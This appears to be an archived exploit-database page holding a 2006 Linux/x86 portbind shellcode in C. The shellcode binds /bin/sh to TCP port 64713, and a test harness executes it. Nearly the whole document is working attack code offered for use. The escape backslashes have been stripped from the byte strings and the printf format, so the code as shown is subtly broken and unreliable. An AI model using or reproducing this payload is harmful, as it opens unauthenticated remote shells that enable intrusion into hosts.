[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 portbind (port 64713) 86 bytes
# Published : 2006-04-06
# Author : Gotfault Security
# Previous Title : win32 Beep Shellcode (SP1/SP2) 35 bytes
# Next Title : linux/x86 Password Authentication portbind Shellcode 166 bytes


/* 
 * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
 * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
 * 
 * portbind shellcode that bind()'s a shell on port 64713/tcp
 *
 */

char shellcode[] = 

  /* socket(AF_INET, SOCK_STREAM, 0) */

  "x6ax66"			// push   $0x66
  "x58"			// pop    %eax
  "x6ax01"			// push   $0x1
  "x5b"			// pop    %ebx
  "x99"			// cltd
  "x52"			// push   %edx
  "x53"			// push   %ebx
  "x6ax02"			// push   $0x2
  "x89xe1"			// mov    %esp,%ecx
  "xcdx80"			// int    $0x80

  /* bind(s, server, sizeof(server)) */

  "x52"			// push   %edx
  "x66x68xfcxc9"		// pushw  $0xc9fc  // PORT = 64713
  "x66x6ax02"		// pushw  $0x2
  "x89xe1"			// mov    $esp,%ecx
  "x6ax10"			// push   $0x10
  "x51"			// push   %ecx
  "x50"			// push   %eax
  "x89xe1"			// mov    %esp,%ecx
  "x89xc6"			// mov    %eax,%esi
  "x43"			// inc    %ebx
  "xb0x66"			// mov    $0x66,%al
  "xcdx80"			// int    $0x80

  /* listen(s, anything) */

  "xb0x66"			// mov    $0x66,%al
  "xd1xe3"			// shl    %ebx
  "xcdx80"			// int    $0x80

  /* accept(s, 0, 0) */

  "x52"			// push   %edx
  "x56"			// push   %esi
  "x89xe1"			// mov    %esp,%ecx
  "x43"			// inc    %ebx
  "xb0x66"			// mov    $0x66,%al
  "xcdx80"			// int    $0x80

  "x93"			// xchg   %eax,%ebx

  /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */

  "x6ax02"			// push   $0x2
  "x59"			// pop    %ecx

  "xb0x3f"			// mov    $0x3f,%al
  "xcdx80"			// int    $0x80
  "x49"			// dec    %ecx
  "x79xf9"			// jns    dup_loop

  /* execve("/bin/sh", ["/bin/sh"], NULL) */

  "x6ax0b"			// push   $0xb
  "x58"			// pop    %eax
  "x52"			// push   %edx
  "x68x2fx2fx73x68"	// push   $0x68732f2f
  "x68x2fx62x69x6e"	// push   $0x6e69622f
  "x89xe3"			// mov    %esp, %ebx
  "x52"			// push   %edx
  "x53"			// push   %ebx
  "x89xe1"			// mov    %esp, %ecx
  "xcdx80";			// int    $0x80

int main() {
 
        int (*f)() = (int(*)())shellcode;
        printf("Length: %un", strlen(shellcode));
        f();
}

// www.Syue.com [2006-04-06]